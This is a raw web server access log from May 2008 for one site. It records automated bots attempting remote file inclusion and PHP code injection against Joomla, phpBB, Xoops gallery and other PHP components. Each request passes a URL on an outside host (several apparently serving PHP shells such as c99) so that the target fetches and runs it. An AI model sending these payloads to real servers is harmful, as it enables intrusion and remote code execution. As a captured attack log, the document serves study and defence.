196.40.15.10 - - [01/May/2008:09:26:31 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [01/May/2008:09:26:31 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [01/May/2008:09:26:31 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [01/May/2008:09:26:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:26:32 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:32 -0700] "GET /logs/access_080118.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:33 -0700] "GET //home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:33 -0700] "GET /logs//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:33 -0700] "GET /logs/access_071230.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:34 -0700] "GET /logs/access_080118.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:34 -0700] "GET //home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:35 -0700] "GET /logs//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:26:35 -0700] "GET /logs/access_071230.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:26:36 -0700] "GET /logs/access_080118.log//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:36 -0700] "GET /logs/access_080118.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:26:36 -0700] "GET //home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:26:36 -0700] "GET /logs//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:36 -0700] "GET //home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:36 -0700] "GET /logs//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:37 -0700] "GET /logs/access_071230.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [01/May/2008:09:26:38 -0700] "GET /logs/access_071230.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:26:38 -0700] "GET /logs/access_071230.log//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:26:40 -0700] "GET /logs/access_080118.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:26:40 -0700] "GET //home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:26:40 -0700] "GET /logs//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.117.79 - - [01/May/2008:09:26:42 -0700] "GET /logs/access_071230.log//home.php?p=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.93.112.60 - - [01/May/2008:09:26:48 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [01/May/2008:09:26:48 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:26:57 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:26:58 -0700] "GET //modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:26:58 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.93.112.60 - - [01/May/2008:09:26:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [01/May/2008:09:26:59 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:27:01 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.80.208.156 - - [01/May/2008:09:27:01 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.r57shell.in/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:27:02 -0700] "GET //modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [01/May/2008:09:27:02 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:27:12 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:27:13 -0700] "GET /logs/access_080118.log//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:27:13 -0700] "GET //home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:27:13 -0700] "GET /logs//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [01/May/2008:09:27:18 -0700] "GET /logs/access_071230.log//home.php?p=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:27:21 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:27:21 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:27:22 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:30 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:30 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:31 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:34 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:34 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:27:34 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:28:08 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:28:10 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.1.143 - - [01/May/2008:09:28:11 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:33 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:33 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:34 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:34 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:28:39 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:40 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:28:40 -0700] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:28:41 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:28:41 -0700] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [01/May/2008:09:28:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/nicosahputra/dobol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:28:48 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:28:48 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.137.18 - - [01/May/2008:09:29:03 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.91.67 - - [01/May/2008:09:29:08 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.nextit.org/components/com_gigcal/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:29:15 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:29:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:29:26 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:29:27 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:29:37 -0700] "GET /logs/main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:41 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:41 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:42 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:42 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:42 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:29:42 -0700] "GET /main.php?pagina=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:42 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:42 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:43 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:43 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:48 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:29:48 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:48 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:29:48 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:29:48 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.125.40 - - [01/May/2008:09:29:51 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.185 - - [01/May/2008:09:29:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.110 - - [01/May/2008:09:29:56 -0700] "GET /tmp/sess_891bb05607aa170a3105e7c877b2f799 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.246.51.45 - - [01/May/2008:09:29:56 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [01/May/2008:09:29:57 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:29:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.53.219.68 - - [01/May/2008:09:30:23 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.privatox.altervista.org/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:30:30 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:30:34 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:30:34 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:30:48 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:51 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:51 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:51 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:53 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:53 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:30:53 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:31:09 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:31:09 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:31:09 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:20 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:20 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:21 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:24 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:24 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:31:24 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.80.208.156 - - [01/May/2008:09:31:26 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.r57shell.in/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.80.208.156 - - [01/May/2008:09:31:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.r57shell.in/c99.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.128.57 - - [01/May/2008:09:31:38 -0700] "GET /logs/access_080131.log/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [01/May/2008:09:31:38 -0700] "GET /logs/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [01/May/2008:09:31:41 -0700] "GET /logs/access_080122.log/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:44 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.9.72 - - [01/May/2008:09:31:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
